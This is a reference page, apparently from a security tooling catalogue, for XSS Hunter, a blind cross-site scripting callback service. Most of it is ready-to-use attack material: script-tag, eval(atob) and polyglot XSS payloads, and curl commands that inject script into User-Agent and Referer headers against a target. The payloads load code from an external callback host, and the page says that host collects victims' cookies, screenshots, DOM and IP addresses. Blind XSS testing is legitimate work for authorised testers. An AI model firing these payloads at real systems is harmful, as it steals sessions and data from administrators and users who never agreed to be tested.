Skip to content

XSS Hunter

Detect and manage blind XSS vulnerabilities

JavaScriptGitHub

Description

XSS Hunter detects blind XSS vulnerabilities by providing a hosted payload that calls back when executed. When your injected payload fires in an admin panel, email client, or internal tool, XSS Hunter captures screenshots, cookies, DOM content, and the execution context. Essential for blind XSS testing.

Installation

BASH 
# Self-hosted (Express edition)
git clone https://github.com/mandatoryprogrammer/xsshunter-express.git
cd xsshunter-express
npm install
# Configure .env with your domain and settings
npm start

# Or use the hosted version (if available)
# Register at xsshunter.com for a callback domain

Basic Usage

JAVASCRIPT 
// Inject this payload into any input that might render elsewhere
"><script src=https://YOUR_SUBDOMAIN.xss.ht></script>

// Attribute-based injection
" onfocus=eval(atob('BASE64_PAYLOAD')) autofocus="

// Image tag injection
<img src=x onerror=eval(atob('BASE64_PAYLOAD'))>

Advanced Usage

JAVASCRIPT 
// Polyglot payload (works in multiple contexts)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

// Payload for Content Security Policy bypass
<script src="https://YOUR_SUBDOMAIN.xss.ht"></script>

// For tight character limits, use short payloads
<svg/onload=import('//YOUR.xss.ht')>

What XSS Hunter Captures

  • Screenshot of the page where XSS executed
  • Cookies (including HttpOnly when possible)
  • DOM snapshot of the page
  • URL where the payload triggered
  • User-Agent and IP of the victim
  • Origin of the injection point

Common Workflows

BASH 
# Inject blind XSS payloads in:
# 1. Contact forms (admin reads submissions)
# 2. User-Agent headers (logged in admin panels)
# 3. Referrer headers (analytics dashboards)
# 4. Support ticket systems
# 5. Email fields (rendered in admin views)
# 6. Feedback forms and surveys

# Example: User-Agent blind XSS
curl -A '"><script src=https://YOUR.xss.ht></script>' https://target.com/

# Example: Referrer header
curl -H 'Referer: "><script src=https://YOUR.xss.ht></script>' https://target.com/
Back to Exploitation